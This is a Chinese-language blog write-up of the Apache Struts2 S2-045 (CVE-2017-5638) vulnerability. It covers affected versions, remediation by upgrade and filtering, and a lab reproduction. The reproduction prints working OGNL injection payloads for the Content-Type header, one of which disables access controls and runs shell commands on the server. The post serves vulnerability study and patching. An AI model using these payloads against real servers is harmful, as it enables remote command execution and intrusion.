Struts2 __ S2-045 Remote Code Execution Vulnerablity __ CVE-2017-5638

Struts2 __ S2-045 Remote Code Execution Vulnerablity __ CVE-2017-5638
说明内容
漏洞编号CVE-2017-5638
漏洞名称S2-045 Remote Code Execution Vulnerablity
影响范围Struts 2.3.5 - Struts 2.3.31,
Struts 2.5 - Struts 2.5.10
漏洞描述pache Struts2的Jakarta Multipart parser插件存在远程代码执行漏洞,
攻击者可以在使用该插件上传文件时,修改HTTP请求头中的Content-Type值来触发该漏洞,导致远程执行代码。
修复方案一、修复方式: 升级Apache Struts版本至 2.3.32 or 2.5.10.1以上。

二、修复建议:在网络防护设备上配置过滤包含如下:

#nike=‘multipart/form-data’

以及

#container=#context[‘com.opensymphony.xwork2.ActionContext.container’

1.漏洞描述

Apache官方发布Struts 2 紧急漏洞公告(S2-045),CVE编号CVE-2017-5638。公告中披露 ,当基于Jakarta插件上传文件时,可导致远程代码执行。例如在系统中获得管理员权限,执行添加用户。可任意查看、修改或删除文件。造成机密数据泄露,重要信息遭到篡改等重大危害。

2.影响版本

Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10

3.漏洞复现

3.1基础环境

访问`http://10.9.75.198:8080`即可看到上传页面

在这里插入图片描述

3.2漏洞复现

使用burp抓包取数据包,然后Content-Type:更改为

Content-Type:
方法一
%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('vulhub',233*233)}.multipart/form-data
方法二
"%{(#xxx='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"pwd"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"

在这里插入图片描述

成功显示

4.漏洞修复

一、修复方式: 升级Apache Struts版本至 2.3.32 or 2.5.10.1以上。

二、修复建议:在网络防护设备上配置过滤包含如下:

#nike='multipart/form-data'

以及

#container=#context['com.opensymphony.xwork2.ActionContext.container'

字段串(及相关字符转义形式)的URL请求。

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值